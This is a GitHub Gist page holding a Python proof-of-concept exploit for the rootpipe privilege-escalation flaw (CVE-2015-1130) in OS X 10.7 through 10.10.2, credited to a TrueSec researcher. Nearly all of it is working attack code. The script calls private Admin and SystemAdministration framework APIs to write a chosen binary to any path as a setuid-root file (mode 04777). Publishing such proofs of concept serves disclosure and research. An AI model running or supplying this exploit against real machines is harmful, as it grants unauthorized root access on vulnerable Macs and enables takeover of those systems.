Last active
August 29, 2015 14:18
-
-
Save ahhh/99685c9f9489d18828cf to your computer and use it in GitHub Desktop.
Exploit code for privilege escalation on OS X 10.7.*, 10.8.*, 10.9.* and 10.10.2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################################## | |
| # | |
| # PoC exploit code for rootpipe (CVE-2015-1130) | |
| # | |
| # Created by Emil Kvarnhammar, TrueSec | |
| # https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/ | |
| # | |
| # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 | |
| # | |
| ######################################################## | |
| import os | |
| import sys | |
| import platform | |
| import re | |
| import ctypes | |
| import objc | |
| import sys | |
| from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions | |
| from Foundation import NSAutoreleasePool | |
| def load_lib(append_path): | |
| return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); | |
| def use_old_api(): | |
| return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) | |
| args = sys.argv | |
| if len(args) != 3: | |
| print "usage: exploit.py source_binary dest_binary_as_root" | |
| sys.exit(-1) | |
| source_binary = args[1] | |
| dest_binary = os.path.realpath(args[2]) | |
| if not os.path.exists(source_binary): | |
| raise Exception("file does not exist!") | |
| pool = NSAutoreleasePool.alloc().init() | |
| attr = NSMutableDictionary.alloc().init() | |
| attr.setValue_forKey_(04777, NSFilePosixPermissions) | |
| data = NSData.alloc().initWithContentsOfFile_(source_binary) | |
| print "will write file", dest_binary | |
| if use_old_api(): | |
| adm_lib = load_lib("/Admin.framework/Admin") | |
| Authenticator = objc.lookUpClass("Authenticator") | |
| ToolLiaison = objc.lookUpClass("ToolLiaison") | |
| SFAuthorization = objc.lookUpClass("SFAuthorization") | |
| authent = Authenticator.sharedAuthenticator() | |
| authref = SFAuthorization.authorization() | |
| # authref with value nil is not accepted on OS X <= 10.8 | |
| authent.authenticateUsingAuthorizationSync_(authref) | |
| st = ToolLiaison.sharedToolLiaison() | |
| tool = st.tool() | |
| tool.createFileWithContents_path_attributes_(data, dest_binary, attr) | |
| else: | |
| adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") | |
| WriteConfigClient = objc.lookUpClass("WriteConfigClient") | |
| client = WriteConfigClient.sharedClient() | |
| client.authenticateUsingAuthorizationSync_(None) | |
| tool = client.remoteProxy() | |
| tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) | |
| print "Done!" | |
| del pool |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment